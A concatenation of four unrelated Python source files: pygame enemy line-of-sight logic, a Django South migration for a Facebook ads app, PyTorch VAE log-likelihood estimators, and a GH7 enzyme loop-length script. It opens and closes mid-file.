                # stop early once every ray is blocked
                if not any(open_view):
                    break
            self.seeing_hero = any(open_view)
        # facing opposite side from hero - agent doesn't see hero
        else:
            self.seeing_hero = False
            # reset sight lines so stale rays are not drawn/used
            for sight in self.sights:
                sight.update()

    def update(self, chamber, offset_x, offset_y):
        """Refresh hero visibility, then advance the state machine."""
        self.check_hero_visibility(chamber, offset_x, offset_y)
        # change state only when enemy stands on the firm ground
        if self.enemy.on_ground:
            self.state.update(chamber)

    def draw(self, chamber, offset_x, offset_y, debug=False):
        """Redraw the overlay layer; draws sight lines, ray collision points
        and the current state label only when `debug` is True."""
        self.layer.fill((0, 0, 0, 0))
        # in case of debug
        if debug:
            # draw lines of sight
            for sight in self.sights:
                self.layer.blit(sight.image, [0, 0])
            # draw collisions points
            for block in chamber.inactive_sprites:
                for i, sight in enumerate(self.sights):
                    dot = sight.collides_with(block, offset_x, offset_y)
                    if dot:
                        pygame.draw.circle(self.layer, (0, 255, 0, 200), dot, 3)
            # draw agent state
            hit_box = self.enemy.get_hit_box()
            state = self.font.render(str(self.state), True, (0, 0, 0))
            x = hit_box.centerx - state.get_width() / 2 - offset_x
            y = hit_box.top - state.get_height() - 10 - offset_y
            # white backdrop rectangle behind the state label
            pygame.draw.rect(
                self.layer,
                (255, 255, 255),
                (x - 2, y - 2, state.get_width() + 4, state.get_height() + 4),
            )
            self.layer.blit(state, (x, y))
|
# filename: facebook_ads/migrations/0009_auto__add_adstatistic__add_field_adgroup_creative__chg_field_adgroup_t.py
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """Auto-generated South schema migration for the facebook_ads app.

    Adds the AdStatistic model and AdGroup.creative FK, and relaxes several
    columns to NULLable. Generated code — do not hand-edit field definitions.
    NOTE(review): max_length is passed as the *string* '100' in a few places
    (e.g. AdStatistic.statistic_id) — South tolerates it, but confirm.
    """

    def forwards(self, orm):
        # Adding model 'AdStatistic'
        db.create_table('facebook_ads_adstatistic', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('statistic_id', self.gf('django.db.models.fields.CharField')(unique=True, max_length='100')),
            ('account', self.gf('django.db.models.fields.related.ForeignKey')(related_name='adstatistics', null=True, to=orm['facebook_ads.AdAccount'])),
            ('campaign', self.gf('django.db.models.fields.related.ForeignKey')(related_name='adstatistics', null=True, to=orm['facebook_ads.AdCampaign'])),
            ('adgroup', self.gf('django.db.models.fields.related.ForeignKey')(related_name='adstatistics', null=True, to=orm['facebook_ads.AdGroup'])),
            ('start_time', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
            ('end_time', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
            ('impressions', self.gf('django.db.models.fields.IntegerField')()),
            ('clicks', self.gf('django.db.models.fields.IntegerField')()),
            ('spent', self.gf('django.db.models.fields.IntegerField')()),
            ('social_impressions', self.gf('django.db.models.fields.IntegerField')()),
            ('social_clicks', self.gf('django.db.models.fields.IntegerField')()),
            ('social_spent', self.gf('django.db.models.fields.IntegerField')()),
            ('actions', self.gf('django.db.models.fields.IntegerField')()),
            ('unique_impressions', self.gf('django.db.models.fields.IntegerField')()),
            ('unique_clicks', self.gf('django.db.models.fields.IntegerField')()),
            ('social_unique_impressions', self.gf('django.db.models.fields.IntegerField')()),
            ('social_unique_clicks', self.gf('django.db.models.fields.IntegerField')()),
            ('connections', self.gf('django.db.models.fields.IntegerField')()),
        ))
        db.send_create_signal('facebook_ads', ['AdStatistic'])

        # Adding field 'AdGroup.creative'
        db.add_column('facebook_ads_adgroup', 'creative', self.gf('django.db.models.fields.related.ForeignKey')(default=None, related_name='adgroups', to=orm['facebook_ads.AdCreative']), keep_default=False)

        # Changing field 'AdGroup.targeting'
        db.alter_column('facebook_ads_adgroup', 'targeting_id', self.gf('django.db.models.fields.related.OneToOneField')(default=0, unique=True, to=orm['facebook_ads.Targeting']))

        # Changing field 'AdCreative.run_status'
        db.alter_column('facebook_ads_adcreative', 'run_status', self.gf('django.db.models.fields.SmallIntegerField')(null=True))

        # Changing field 'AdCreative.type'
        db.alter_column('facebook_ads_adcreative', 'type', self.gf('django.db.models.fields.IntegerField')(null=True))

        # Changing field 'AdCampaign.start_time'
        db.alter_column('facebook_ads_adcampaign', 'start_time', self.gf('django.db.models.fields.DateTimeField')(null=True))

        # Changing field 'AdCampaign.updated_time'
        db.alter_column('facebook_ads_adcampaign', 'updated_time', self.gf('django.db.models.fields.DateTimeField')(null=True))

        # Changing field 'AdCampaign.campaign_status'
        db.alter_column('facebook_ads_adcampaign', 'campaign_status', self.gf('django.db.models.fields.SmallIntegerField')(null=True))

        # Changing field 'AdCampaign.daily_imps'
        db.alter_column('facebook_ads_adcampaign', 'daily_imps', self.gf('django.db.models.fields.IntegerField')(null=True))

        # Changing field 'AdAccount.daily_spend_limit'
        db.alter_column('facebook_ads_adaccount', 'daily_spend_limit', self.gf('django.db.models.fields.IntegerField')(null=True))

        # Changing field 'AdAccount.vat_status'
        db.alter_column('facebook_ads_adaccount', 'vat_status', self.gf('django.db.models.fields.IntegerField')(null=True))

        # Changing field 'AdAccount.timezone_id'
        db.alter_column('facebook_ads_adaccount', 'timezone_id', self.gf('django.db.models.fields.IntegerField')(null=True))

        # Changing field 'AdAccount.account_status'
        db.alter_column('facebook_ads_adaccount', 'account_status', self.gf('django.db.models.fields.SmallIntegerField')(null=True))

        # Changing field 'AdAccount.is_personal'
        db.alter_column('facebook_ads_adaccount', 'is_personal', self.gf('django.db.models.fields.IntegerField')(null=True))

    def backwards(self, orm):
        # Deleting model 'AdStatistic'
        db.delete_table('facebook_ads_adstatistic')

        # Deleting field 'AdGroup.creative'
        db.delete_column('facebook_ads_adgroup', 'creative_id')

        # Changing field 'AdGroup.targeting'
        db.alter_column('facebook_ads_adgroup', 'targeting_id', self.gf('django.db.models.fields.related.OneToOneField')(unique=True, null=True, to=orm['facebook_ads.Targeting']))

        # Changing field 'AdCreative.run_status'
        db.alter_column('facebook_ads_adcreative', 'run_status', self.gf('django.db.models.fields.SmallIntegerField')(default=None))

        # Changing field 'AdCreative.type'
        db.alter_column('facebook_ads_adcreative', 'type', self.gf('django.db.models.fields.IntegerField')(default=None))

        # Changing field 'AdCampaign.start_time'
        db.alter_column('facebook_ads_adcampaign', 'start_time', self.gf('django.db.models.fields.DateTimeField')(default=None))

        # Changing field 'AdCampaign.updated_time'
        db.alter_column('facebook_ads_adcampaign', 'updated_time', self.gf('django.db.models.fields.DateTimeField')(default=None))

        # Changing field 'AdCampaign.campaign_status'
        db.alter_column('facebook_ads_adcampaign', 'campaign_status', self.gf('django.db.models.fields.SmallIntegerField')(default=None))

        # Changing field 'AdCampaign.daily_imps'
        db.alter_column('facebook_ads_adcampaign', 'daily_imps', self.gf('django.db.models.fields.IntegerField')(default=None))

        # Changing field 'AdAccount.daily_spend_limit'
        db.alter_column('facebook_ads_adaccount', 'daily_spend_limit', self.gf('django.db.models.fields.IntegerField')(default=None))

        # Changing field 'AdAccount.vat_status'
        db.alter_column('facebook_ads_adaccount', 'vat_status', self.gf('django.db.models.fields.IntegerField')(default=None))

        # Changing field 'AdAccount.timezone_id'
        db.alter_column('facebook_ads_adaccount', 'timezone_id', self.gf('django.db.models.fields.IntegerField')(default=None))

        # Changing field 'AdAccount.account_status'
        db.alter_column('facebook_ads_adaccount', 'account_status', self.gf('django.db.models.fields.SmallIntegerField')(default=None))

        # Changing field 'AdAccount.is_personal'
        db.alter_column('facebook_ads_adaccount', 'is_personal', self.gf('django.db.models.fields.IntegerField')(default=None))

    # frozen ORM snapshot used by South to build the orm object above
    models = {
        'facebook_ads.adaccount': {
            'Meta': {'object_name': 'AdAccount'},
            'account_id': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
            'account_status': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
            'business_city': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'business_country_code': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'business_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'business_state': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'business_street': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'business_street2': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'business_zip': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'currency': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'daily_spend_limit': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_personal': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'timezone_id': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
            'timezone_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'vat_status': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
        },
        'facebook_ads.adcampaign': {
            'Meta': {'object_name': 'AdCampaign'},
            'account': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adcampaigns'", 'to': "orm['facebook_ads.AdAccount']"}),
            'campaign_id': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
            'campaign_status': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
            'daily_budget': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'daily_imps': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
            'end_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'lifetime_budget': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'start_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
            'updated_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
        },
        'facebook_ads.adcreative': {
            'Meta': {'object_name': 'AdCreative'},
            'auto_update': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'body': ('django.db.models.fields.CharField', [], {'max_length': '135'}),
            'count_current_adgroups': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'creative_id': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image_hash': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'image_url': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'link_url': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'object_id': ('django.db.models.fields.BigIntegerField', [], {'null': 'True', 'blank': 'True'}),
            'preview_url': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'related_fan_page': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'run_status': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
            'story_id': ('django.db.models.fields.BigIntegerField', [], {'null': 'True', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '25'}),
            'type': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
            'view_tag': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'facebook_ads.adgroup': {
            'Meta': {'object_name': 'AdGroup'},
            'account': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adgroups'", 'to': "orm['facebook_ads.AdAccount']"}),
            'ad_id': ('django.db.models.fields.BigIntegerField', [], {}),
            'ad_status': ('django.db.models.fields.IntegerField', [], {}),
            'adgroup_id': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True'}),
            'adgroup_status': ('django.db.models.fields.IntegerField', [], {}),
            'bid_type': ('django.db.models.fields.IntegerField', [], {}),
            'campaign': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adgroups'", 'to': "orm['facebook_ads.AdCampaign']"}),
            'creative': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adgroups'", 'to': "orm['facebook_ads.AdCreative']"}),
            'end_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'max_bid': ('django.db.models.fields.IntegerField', [], {}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'start_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'targeting': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'adgroup'", 'unique': 'True', 'to': "orm['facebook_ads.Targeting']"}),
            'updated_time': ('django.db.models.fields.DateTimeField', [], {})
        },
        'facebook_ads.adstatistic': {
            'Meta': {'object_name': 'AdStatistic'},
            'account': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adstatistics'", 'null': 'True', 'to': "orm['facebook_ads.AdAccount']"}),
            'actions': ('django.db.models.fields.IntegerField', [], {}),
            'adgroup': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adstatistics'", 'null': 'True', 'to': "orm['facebook_ads.AdGroup']"}),
            'campaign': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'adstatistics'", 'null': 'True', 'to': "orm['facebook_ads.AdCampaign']"}),
            'clicks': ('django.db.models.fields.IntegerField', [], {}),
            'connections': ('django.db.models.fields.IntegerField', [], {}),
            'end_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'impressions': ('django.db.models.fields.IntegerField', [], {}),
            'social_clicks': ('django.db.models.fields.IntegerField', [], {}),
            'social_impressions': ('django.db.models.fields.IntegerField', [], {}),
            'social_spent': ('django.db.models.fields.IntegerField', [], {}),
            'social_unique_clicks': ('django.db.models.fields.IntegerField', [], {}),
            'social_unique_impressions': ('django.db.models.fields.IntegerField', [], {}),
            'spent': ('django.db.models.fields.IntegerField', [], {}),
            'start_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'statistic_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': "'100'"}),
            'unique_clicks': ('django.db.models.fields.IntegerField', [], {}),
            'unique_impressions': ('django.db.models.fields.IntegerField', [], {})
        },
        'facebook_ads.targeting': {
            'Meta': {'object_name': 'Targeting'},
            'age_max': ('facebook_ads.fields.PositiveSmallIntegerRangeField', [], {'null': 'True', 'blank': 'True'}),
            'age_min': ('facebook_ads.fields.PositiveSmallIntegerRangeField', [], {'null': 'True', 'blank': 'True'}),
            'broad_age': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
            'cities': ('facebook_ads.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
            'college_majors': ('facebook_ads.fields.CommaSeparatedCharField', [], {'max_length': '100'}),
            'college_networks': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'college_years': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '100'}),
            'connections': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '100'}),
            'countries': ('facebook_ads.fields.CommaSeparatedCharField', [], {'max_length': '100', 'blank': 'True'}),
            'education_statuses': ('facebook_ads.fields.CommaSeparatedCharField', [], {'max_length': '100'}),
            'excluded_connections': ('facebook_ads.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
            'friends_of_connections': ('facebook_ads.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
            'genders': ('facebook_ads.fields.CommaSeparatedCharField', [], {'max_length': '5', 'null': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'interested_in': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'keywords': ('facebook_ads.fields.CommaSeparatedCharField', [], {'max_length': '4000'}),
            'locales': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'radius': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
            'regions': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'relationship_statuses': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'user_adclusters': ('facebook_ads.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
            'user_event': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '100'}),
            'work_networks': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'zips': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        }
    }

    complete_apps = ['facebook_ads']
|
import math
import numpy as np
import torch
from mimic.evaluation.divergence_measures.mm_div import alpha_poe
from mimic.utils import utils
from mimic import log
# log(2*pi), shared by the Gaussian log-density helpers below.
LOG2PI = float(np.log(2.0 * math.pi))
def get_latent_samples(flags, latents, n_imp_samples, mod_names=None):
    """Draw importance samples from the content (and optionally style) posteriors.

    @param flags: config; only `flags.factorized_representation` is read here
    @param latents: dict with 'content' -> (mu, logvar) and
        'style' -> {modality: (mu, logvar)}
    @param n_imp_samples: number of importance samples per data point
    @param mod_names: modality names; used to fill the style dict with None
        when the representation is not factorized
    @return: {'content': {'mu','logvar','z'}, 'style': {mod: same-or-None}}

    Cleanup vs. previous version: unused `enumerate` indices removed and the
    style dicts built idiomatically (iterate `.items()` / dict comprehension);
    behavior is unchanged.
    """
    l_c = latents['content']
    l_s = latents['style']
    # repeat posterior params once per importance sample -> (n_imp_samples, batch, dim)
    l_c_m_rep = l_c[0].unsqueeze(0).repeat(n_imp_samples, 1, 1)
    l_c_lv_rep = l_c[1].unsqueeze(0).repeat(n_imp_samples, 1, 1)
    c_emb = utils.reparameterize(l_c_m_rep, l_c_lv_rep)
    c = {'mu': l_c_m_rep, 'logvar': l_c_lv_rep, 'z': c_emb}
    if flags.factorized_representation:
        styles = {}
        for key, l_s_mod in l_s.items():
            l_s_m_rep = l_s_mod[0].unsqueeze(0).repeat(n_imp_samples, 1, 1)
            l_s_lv_rep = l_s_mod[1].unsqueeze(0).repeat(n_imp_samples, 1, 1)
            s_emb = utils.reparameterize(l_s_m_rep, l_s_lv_rep)
            styles[key] = {'mu': l_s_m_rep, 'logvar': l_s_lv_rep, 'z': s_emb}
    else:
        # no style factorization: every modality's style entry is None
        styles = {key: None for key in mod_names}
    return {'content': c, 'style': styles}
def get_dyn_prior(weights, mus, logvars):
    """Fuse expert Gaussians into a dynamic prior via the alpha-weighted
    product of experts; returns [mu, logvar] as a two-element list."""
    fused_mu, fused_logvar = alpha_poe(weights, mus, logvars)
    return [fused_mu, fused_logvar]
def log_mean_exp(x, dim=1):
    """Numerically stable log(mean(exp(x))) along `dim`.

    The max is subtracted before exponentiating to avoid overflow; the
    reduced dimension is kept (size 1) in the result.

    @param x: torch.Tensor of log-values
    @param dim: dimension to average over (default: 1)
    @return: torch.Tensor with `dim` kept as size 1
    """
    x_max = torch.max(x, dim=dim, keepdim=True)[0]
    shifted = torch.exp(x - x_max)
    return x_max + torch.log(torch.mean(shifted, dim=dim, keepdim=True))
def gaussian_log_pdf(x, mu, logvar):
    """Diagonal-Gaussian log-density of x under N(mu, exp(logvar)).

    @param x: samples from gaussian
    @param mu: mean of distribution
    @param logvar: log variance of distribution
    @return log_pdf: PyTorch.Tensor, per-sample log-likelihood summed over dim 1

    Cleanup vs. previous version: the `global LOG2PI` statement was a no-op
    (read-only access never needs `global`); the constant is now computed
    locally so the function is self-contained. Values are unchanged.
    """
    log2pi = math.log(2.0 * math.pi)
    log_pdf = -0.5 * log2pi - logvar / 2. - torch.pow(x - mu, 2) / (2. * torch.exp(logvar))
    return torch.sum(log_pdf, dim=1)
def unit_gaussian_log_pdf(x):
    """Standard-normal log-density of x under N(0, 1).

    @param x: PyTorch.Tensor, samples from gaussian
    @return log_pdf: PyTorch.Tensor, per-sample log-likelihood summed over dim 1

    Cleanup vs. previous version: removed the no-op `global LOG2PI` statement
    and the dead term `- math.log(1.) / 2.` (identically zero, since the unit
    Gaussian's log-variance is 0). Values are unchanged.
    """
    log2pi = math.log(2.0 * math.pi)
    log_pdf = -0.5 * log2pi - torch.pow(x, 2) / 2.
    return torch.sum(log_pdf, dim=1)
def log_marginal_estimate(flags, n_samples, likelihood, image, style, content, dynamic_prior=None):
    r"""Importance-sampling estimate of log p(x). NOTE: this is not the
    objective that should be directly optimized.

    @param flags: config object; only `flags.batch_size` is read here
    @param n_samples: number of importance samples drawn per example
    @param likelihood: distribution over the data exposing `log_prob`
    @param image: observed data batch; 3-D and 4-D inputs are tiled to
        (batch_size * n_samples, ...) below, other shapes are used as-is
    @param style: dict with 'z', 'mu', 'logvar' for the style posterior, or None
    @param content: dict with 'z', 'mu', 'logvar' for the content posterior
    @param dynamic_prior: optional dict with 'mu', 'logvar'; when None the
        content prior is the unit Gaussian
    @return: scalar tensor — batch mean of log-mean-exp of importance weights
    """
    batch_size = flags.batch_size
    if style is not None:
        z_style = style['z']
        logvar_style = style['logvar']
        mu_style = style['mu']
        # assumes z_style is 2-D (batch*n_samples, style_dim); n is unused — TODO confirm
        n, z_style_dim = z_style.size()
        style_log_q_z_given_x_2d = gaussian_log_pdf(z_style, mu_style, logvar_style)
        log_p_z_2d_style = unit_gaussian_log_pdf(z_style)
    d_shape = image.shape
    # for text mod: d_shape = [5, 1024]
    if len(d_shape) == 3:
        # tile the batch once per importance sample, then flatten to 3-D
        image = image.unsqueeze(0).repeat(n_samples, 1, 1, 1)
        image = image.view(batch_size * n_samples, d_shape[-2], d_shape[-1])
    elif len(d_shape) == 4:
        image = image.unsqueeze(0).repeat(n_samples, 1, 1, 1, 1)
        image = image.view(batch_size * n_samples, d_shape[-3], d_shape[-2],
                           d_shape[-1])
    z_content = content['z']
    mu_content = content['mu']
    logvar_content = content['logvar']
    log.debug(f'Computing log prob of image with shape: {image.shape}')
    # reconstruction term: log p(x|z), summed over all data dimensions
    log_p_x_given_z_2d = likelihood.log_prob(image).view(batch_size * n_samples,
                                                         -1).sum(dim=1)
    content_log_q_z_given_x_2d = gaussian_log_pdf(z_content, mu_content, logvar_content)
    if dynamic_prior is None:
        log_p_z_2d_content = unit_gaussian_log_pdf(z_content)
    else:
        # evaluate the content prior under the supplied dynamic prior instead
        mu_prior = dynamic_prior['mu']
        logvar_prior = dynamic_prior['logvar']
        log_p_z_2d_content = gaussian_log_pdf(z_content, mu_prior, logvar_prior)
    if style is not None:
        # style and content latents are independent: log-densities add
        log_p_z_2d = log_p_z_2d_style + log_p_z_2d_content
        log_q_z_given_x_2d = style_log_q_z_given_x_2d + content_log_q_z_given_x_2d
    else:
        log_p_z_2d = log_p_z_2d_content
        log_q_z_given_x_2d = content_log_q_z_given_x_2d
    # importance weight: log p(x|z) + log p(z) - log q(z|x)
    log_weight_2d = log_p_x_given_z_2d + log_p_z_2d - log_q_z_given_x_2d
    log_weight = log_weight_2d.view(batch_size, n_samples)

    # need to compute normalization constant for weights
    # i.e. log ( mean ( exp ( log_weights ) ) )
    log_p = log_mean_exp(log_weight, dim=1)
    return torch.mean(log_p)
def log_joint_estimate(flags, n_samples, likelihoods, targets, styles, content, dynamic_prior=None):
    r"""Estimate the joint log-likelihood log p(x, y) over all modalities
    by importance sampling. NOTE: not the training objective.

    @param flags: config object; flags.batch_size and flags.device are read
    @param n_samples: number of importance samples per data point
    @param likelihoods: dict modality -> distribution with a log_prob method
    @param targets: dict modality -> observed data tensor
    @param styles: dict modality -> style dict ('z'/'mu'/'logvar') or None
        per modality. NOTE(review): styles.keys() is also used
        unconditionally below (num_mods and both loops), so passing
        styles=None would raise despite the guard — callers apparently
        always pass a dict; confirm.
    @param content: dict with 'z', 'mu', 'logvar' for the shared content latents
    @param dynamic_prior: optional dict with 'mu'/'logvar' replacing the
        unit-Gaussian content prior
    @return: scalar torch.Tensor, batch mean of the estimated joint log-likelihood
    """
    batch_size = flags.batch_size
    if styles is not None:
        styles_log_q_z_given_x_2d = {}
        styles_p_z_2d = {}
        for key in styles.keys():
            if styles[key] is not None:
                style_m = styles[key]
                z_style_m = style_m['z']
                logvar_style_m = style_m['logvar']
                mu_style_m = style_m['mu']
                # Per-modality log q(z_s|x) and unit-Gaussian log p(z_s)
                style_m_log_q_z_given_x_2d = gaussian_log_pdf(z_style_m, mu_style_m, logvar_style_m)
                log_p_z_2d_style_m = unit_gaussian_log_pdf(z_style_m)
                styles_log_q_z_given_x_2d[key] = style_m_log_q_z_given_x_2d
                styles_p_z_2d[key] = log_p_z_2d_style_m
    z_content = content['z']
    mu_content = content['mu']
    logvar_content = content['logvar']
    num_mods = len(styles.keys())
    # One row per modality of per-(sample, batch) reconstruction log-likelihoods
    log_px_zs = torch.zeros(num_mods, batch_size * n_samples)
    log_px_zs = log_px_zs.to(flags.device)
    for k, key in enumerate(styles.keys()):
        batch_d = targets[key]
        d_shape = batch_d.shape
        # Tile each target n_samples times so every importance sample
        # scores its own copy of the data.
        if len(d_shape) == 3:
            batch_d = batch_d.unsqueeze(0).repeat(n_samples, 1, 1, 1)
            batch_d = batch_d.view(batch_size * n_samples, d_shape[-2], d_shape[-1])
        elif len(d_shape) == 4:
            batch_d = batch_d.unsqueeze(0).repeat(n_samples, 1, 1, 1, 1)
            batch_d = batch_d.view(batch_size * n_samples, d_shape[-3], d_shape[-2],
                                   d_shape[-1])
        lhood = likelihoods[key]
        log_p_x_given_z_2d = lhood.log_prob(batch_d).view(batch_size * n_samples, -1).sum(dim=1)
        log_px_zs[k] = log_p_x_given_z_2d
    # compute components of likelihood estimate
    log_joint_zs_2d = log_px_zs.sum(0)  # sum over modalities
    # Content prior: unit Gaussian unless a dynamic prior is supplied
    if dynamic_prior is None:
        log_p_z_2d_content = unit_gaussian_log_pdf(z_content)
    else:
        mu_prior = dynamic_prior['mu']
        logvar_prior = dynamic_prior['logvar']
        log_p_z_2d_content = gaussian_log_pdf(z_content, mu_prior, logvar_prior)
    content_log_q_z_given_x_2d = gaussian_log_pdf(z_content, mu_content, logvar_content)
    log_p_z_2d = log_p_z_2d_content
    log_q_z_given_x_2d = content_log_q_z_given_x_2d
    if styles is not None:
        # Add the style terms for every modality that supplied a style latent
        for k, key in enumerate(styles.keys()):
            if key in styles_p_z_2d and key in styles_log_q_z_given_x_2d:
                log_p_z_2d += styles_p_z_2d[key]
                log_q_z_given_x_2d += styles_log_q_z_given_x_2d[key]
    # Importance weights: log p(x|z) + log p(z) - log q(z|x)
    log_weight_2d = log_joint_zs_2d + log_p_z_2d - log_q_z_given_x_2d
    log_weight = log_weight_2d.view(batch_size, n_samples)
    log_p = log_mean_exp(log_weight, dim=1)
    return torch.mean(log_p)
|
"""
Prediction of GH7 subtypes (CBH/EG) with machine learning (ML)
"""
# Imports
#===========#
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import pydot_ng as pydot
from imblearn.under_sampling import RandomUnderSampler
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import KFold
from sklearn.tree import DecisionTreeClassifier
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.linear_model import LogisticRegression
from sklearn import tree
from sklearn.externals.six import StringIO
import warnings
warnings.filterwarnings("ignore")
import bioinf
# Get lengths of loops from MSA
#================================================#
def get_gh7looplength(msafasta, trecel7a_pos=0):
    ''' Return a DataFrame of the number of residues in the 8 loops of GH7 sequences in
    an MSA fasta file. TreCel7A is used as reference for determining the loop positions
    in the MSA. The position of TreCel7A in the fasta file is trecel7a_pos (0 if first).
    Loop lengths are in the order [A1, A2, A3, A4, B1, B2, B3, B4]. '''
    # Loop residues in TreCel7A
    loopres = ['QSAQK', 'TSSGVPAQVESQS', 'DYYAN', 'TNETSSTPGA',
               'YDGNTW', 'PSSNNANT', 'GGTYSDNRYG', 'GGSS']  # Residues in the loops of TreCel7A
    loopmore = ['NVGARLY', 'PNAKVTFSNIK', 'MLWLDST', 'VRGSCSTSSGVPA',
                'SSTLCPD', 'GIGGHGSCCS', 'GTCDPDGCDWNP', 'FSDKGGL']  # Residues just after each loop
    # Get aligned sequences
    [heads, sequences] = bioinf.split_fasta(msafasta)  # Retrieve sequences from fasta file
    trecel7a_seq_msa = sequences[trecel7a_pos]
    trecel7a_nogaps = trecel7a_seq_msa.replace('-', '')
    trecel7a_list = list(trecel7a_seq_msa)
    # Replace each residue character in the aligned TreCel7A sequence with
    # its ungapped residue index (as a string), so an ungapped position can
    # be mapped back to its MSA column with list.index below.
    numb = -1
    for k in range(len(trecel7a_list)):
        if trecel7a_list[k].isalpha():
            numb += 1
            trecel7a_list[k] = str(numb)
    # MSA column where each loop starts, and where the post-loop motif
    # starts (i.e. one past the loop end), via the ungapped motif positions.
    startpos = [trecel7a_list.index(str(trecel7a_nogaps.index(loopres[i])))
                for i in range(len(loopres))]
    stoppos = [trecel7a_list.index(str(trecel7a_nogaps.index(loopmore[i])))
               for i in range(len(loopmore))]
    # Reference loop span measured in MSA columns
    length = [stoppos[i] - startpos[i] for i in range(len(startpos))]
    # Determine loop length for each sequence: the reference span minus the
    # number of gap characters that sequence has within the span.
    store = []
    for i in range(len(sequences)):
        seq = sequences[i]
        loopregion = [seq[startpos[k]:stoppos[k]] for k in range(len(loopres))]
        looplength = [length[k] - loopregion[k].count('-') for k in range(len(loopres))]
        store.append(looplength)
    # Save results as DataFrame
    result = pd.DataFrame(store)
    result.columns = ['A1', 'A2', 'A3', 'A4', 'B1', 'B2', 'B3', 'B4']
    return result
# Calculate loop lengths for every sequence in the structure-based MSA
msafile = 'fasta/structure_based_alignment/cel7_nr99_structaln.fasta'
looplength = get_gh7looplength(msafile, trecel7a_pos=0)
# Write results to spreadsheet: 1-based row index plus accession column
looplength.index = range(1, len(looplength)+1)
